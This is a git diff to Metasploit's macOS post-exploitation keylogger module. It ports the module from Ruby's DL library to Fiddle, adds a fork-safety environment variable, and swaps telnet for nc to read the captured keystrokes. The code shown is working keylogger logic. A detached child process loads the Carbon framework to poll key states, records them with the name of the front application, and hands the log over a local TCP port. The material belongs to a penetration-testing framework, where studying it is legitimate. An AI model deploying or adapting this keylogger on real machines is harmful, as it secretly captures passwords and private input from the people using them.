diff --git a/modules/post/osx/capture/keylog_recorder.rb b/modules/post/osx/capture/keylog_recorder.rb index fb6e0cb819..3eb81481ac 100644 --- a/modules/post/osx/capture/keylog_recorder.rb +++ b/modules/post/osx/capture/keylog_recorder.rb @@ -62,9 +62,9 @@ class MetasploitModule < Msf::Post :duration => datastore['DURATION'].to_i, :port => self.port } - cmd = ['ruby', '-e', ruby_code(opts)] - rpid = cmd_exec(cmd.shelljoin, nil, 10) + cmd = "OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES ruby -e #{ruby_code(opts).shellescape}" + rpid = cmd_exec(cmd, nil, 10) if rpid =~ /^\d+/ print_status "Ruby process executing with pid #{rpid.to_i}" @@ -100,7 +100,9 @@ class MetasploitModule < Msf::Post print_status "Sending USR1 signal to open TCP port..." cmd_exec("kill -USR1 #{self.pid}") print_status "Dumping logs..." - log = cmd_exec("telnet localhost #{self.port}") + # Telnet is not existent in High Sierra by default + log = cmd_exec("nc localhost #{self.port}") + print_status log log_a = log.scan(/^\[.+?\] \[.+?\] .*$/) log = log_a.join("\n")+"\n" print_status "#{log_a.size} keystrokes captured" @@ -144,50 +146,14 @@ class MetasploitModule < Msf::Post # Kick off a child process and let parent die child_pid = fork do require 'thread' - require 'dl' - require 'dl/import' - + require 'fiddle' + require 'fiddle/import' options = { :duration => #{opts[:duration]}, :port => #{opts[:port]} } - - #### Patches to DL (for compatibility between 1.8->1.9) - - Importer = if defined?(DL::Importer) then DL::Importer else DL::Importable end - - def ruby_1_9_or_higher? - RUBY_VERSION.to_f >= 1.9 - end - - def malloc(size) - if ruby_1_9_or_higher? - DL::CPtr.malloc(size) - else - DL::malloc(size) - end - end - - # the old Ruby Importer defaults methods to downcase every import - # This is annoying, so we'll patch with method_missing - if not ruby_1_9_or_higher? - module DL - module Importable - def method_missing(meth, *args, &block) - str = meth.to_s - lower = str[0,1].downcase + str[1..-1] - if self.respond_to? lower, true - self.send lower, *args - else - super - end - end - end - end - end - #### 1-way IPC #### log = '' @@ -200,7 +166,7 @@ child_pid = fork do server = TCPServer.new(options[:port]) client = server.accept log_semaphore.synchronize do - client.puts(log+"\n\r") + client.puts(log+"\n") log = '' end client.close @@ -217,7 +183,7 @@ child_pid = fork do MAX_APP_NAME = 80 module Carbon - extend Importer + extend Fiddle::Importer dlload '/System/Library/Frameworks/Carbon.framework/Carbon' extern 'unsigned long CopyProcessName(const ProcessSerialNumber *, void *)' extern 'void GetFrontProcess(ProcessSerialNumber *)' @@ -228,11 +194,11 @@ child_pid = fork do extern 'int CFStringGetLength(void *)' end - psn = malloc(16) - name = malloc(16) - name_cstr = malloc(MAX_APP_NAME) - keymap = malloc(16) - state = malloc(8) + psn = Fiddle::Pointer.malloc(16) + name = Fiddle::Pointer.malloc(16) + name_cstr = Fiddle::Pointer.malloc(MAX_APP_NAME) + keymap = Fiddle::Pointer.malloc(16) + state = Fiddle::Pointer.malloc(8) #### Actual Keylogger code @@ -305,7 +271,7 @@ child_pid = fork do if ascii != 0 or ctrlchar != "" log_semaphore.synchronize do if app_name != lastWindow - log = log << "[\#{Time.now.to_i}] [\#{app_name}]\\n" + log = log << "[\#{Time.now.to_i}] [\#{app_name}]\n" lastWindow = app_name end if ctrlchar != "" @@ -330,4 +296,3 @@ Process.detach(child_pid) EOS end end -